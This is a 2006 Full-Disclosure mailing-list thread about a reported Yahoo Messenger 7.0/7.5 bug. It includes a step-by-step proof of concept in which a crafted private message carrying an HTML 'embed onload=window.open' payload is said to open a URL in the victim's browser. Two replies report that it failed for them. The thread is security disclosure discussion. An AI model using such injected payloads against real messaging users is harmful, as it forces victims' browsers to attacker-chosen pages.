[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <a298f4f70607280922j7cf11000k630c34fd1598bb83@mail.gmail.com>
Date: Fri, 28 Jul 2006 11:22:06 -0500
From: evilrabbi <evilrabbi@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Yahoo messenger serious bug
didnt' work for me either.
On 7/28/06, John Dietz <www.whitewolf@...il.com> wrote:
>
> I just tried this in Mesenger 7.0 and it never opened a browser window. I
> copied the text exactly from here and made sure the space after helomsg was
> [Alt]+0160 and the most I could get it to do was do a Yahoo Search on the
> string. Other side sees:
>
> s: helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg<?#@@*-%29?@...3@;?%28msg>:
> ---------------------------------------------<embed
> onload=window.open('http:\\\\google.com/')>helomsg
> :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg <?#@@*-%29?@...3@;?%28msg>:
> ---------------------------------------------<embed
> onload=window.open('http:\\\\google.com/')>helomsg
> :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(
> Yahoo! Search: No results were found for helomsg
> :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg <?#@@*-%29?@...3@;?%28msg>:
> ---------------------------------------------<embed
>
> onload=window.open('http:\\\\google.com/')>helomsg
> :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg <?#@@*-%29?@...3@;?%28msg>:
> ---------------------------------------------<embed
> onload=window.open('http:\\\\google.com/')>helomsg
> :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(.
>
> There must be some other settings on either mesenger or the computer
> itself for this to work as you say. Possibly a setting for mesenger to use
> your default browser for searches in stead of the PM window?
>
> Cheers
>
>
> On 7/28/06, Ivan Ivan <ivancool2003@...oo.com.ar> wrote:
> >
> > Hi,
> > I found another vulnerability in yahoo messenger that
> > if you receive a Private message with this string
> >
> > "helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
> > onload=window.open('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
> >
> > onload=window.open
> > ('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?("
> > (without quotes) Yahoo messenger open in this case
> > google.com in the internet explorer of the remote
> > victim.
> >
> > Yahoo messenger bug proof of concept:
> >
> > 1. Open messenger and log it.
> >
> > 2. Open a yahoo chat third party like yahelite through
> > Ymsgr protocol and log it with another account.
> >
> > 3. Send a Pm to the messenger account with this
> > string: s: helomsg
> >
> > :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
> > onload=window.open('http:\\\\google.com/')>helomsg
> > :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
> >
> > onload=window.open('http:\\\\google.com/')>helomsg
> > :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(
> >
> > 4. The remote user will open www.google.com (you can
> > change)
> >
> > Note: "helomsg :" this space must be created with
> > alt+0160 and this "s: " with a space
> >
> >
> > s:[space]helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
> > onload=window.open('http:\\\\google.com/')>helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
> >
> > onload=window.open
> > ('http:\\\\google.com/')>helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(
> >
> > Tested in yahoo messenger 7.0/7.5
> >
> >
> > Regards.
> >
> >
> >
> >
> >
> > __________________________________________________
> > Preguntá. Respondé. Descubrí.
> > Todo lo que querías saber, y lo que ni imaginabas,
> > está en Yahoo! Respuestas (Beta).
> > ¡Probalo ya!
> > http://www.yahoo.com.ar/respuestas
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
>
> --
> There is intelligence is in having all the answers, but wisdom lies in
> knowing which of the questions to answer.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
--
-- h0 h0 h0 --
www.nopsled.net
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists